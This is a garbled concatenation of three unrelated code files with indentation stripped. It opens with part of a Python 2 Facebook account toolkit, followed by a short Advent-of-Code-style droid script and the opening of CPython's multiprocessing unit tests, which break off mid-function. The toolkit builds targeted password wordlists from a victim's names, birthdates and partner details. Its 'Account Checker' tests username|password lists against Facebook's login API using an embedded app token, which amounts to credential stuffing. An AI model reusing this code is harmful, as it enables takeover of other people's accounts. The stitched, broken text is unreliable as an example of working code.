print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
part2.py
|
#!/usr/bin/env python3
import sys
import os
import threading
from time import sleep
from program import Program
from droid import Droid
SLEEP_DURATION = 0.0001
def play(d):
while d.is_running():
os.system("clear")
d.display()
if not d.explore():
break
sleep(SLEEP_DURATION)
d.read_sensor()
d.init_oxygen()
i = 0
while d.expand_oxygen():
i += 1
os.system("clear")
d.display()
sleep(SLEEP_DURATION)
print(i)
def main():
data = sys.stdin.readline()
d = Droid(Program(data))
threads = [
threading.Thread(target=d.execute),
threading.Thread(target=lambda: play(d)),
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import socket_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
if support.check_sanitizer(address=True):
# bpo-45200: Skip multiprocessing tests if Python is built with ASAN to
# work around a libasan race condition: dead lock in pthread_create().
raise unittest.SkipTest("libasan has a pthread_create() dead lock")
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
gc.collect() # For PyPy or other GCs.
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
